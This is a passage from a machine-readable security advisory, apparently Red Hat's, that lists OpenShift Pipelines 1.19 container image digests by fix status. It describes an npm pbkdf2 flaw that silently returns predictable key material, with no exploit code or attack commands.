"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2374370"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the npm pbkdf2 library, allowing signature spoofing. When executing in javascript engines other than Nodejs or Nodejs when importing pbkdf2/browser, certain algorithms will silently fail and return invalid data. The return values are predictable, which undermines the security guarantees of the package.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pbkdf2: pbkdf2 silently returns predictable key material",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated important because it causes the pbkdf2 module to quietly return weak or zero-filled keys when certain algorithm names are used incorrectly in browsers or bundled code, this causes the function to silently return a predictable value (such as a zero-filled buffer or uninitialized memory) instead of a securely derived key, completely undermining the confidentiality and integrity of any cryptographic operation where attackers could guess or reuse these keys to access or change protected data.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
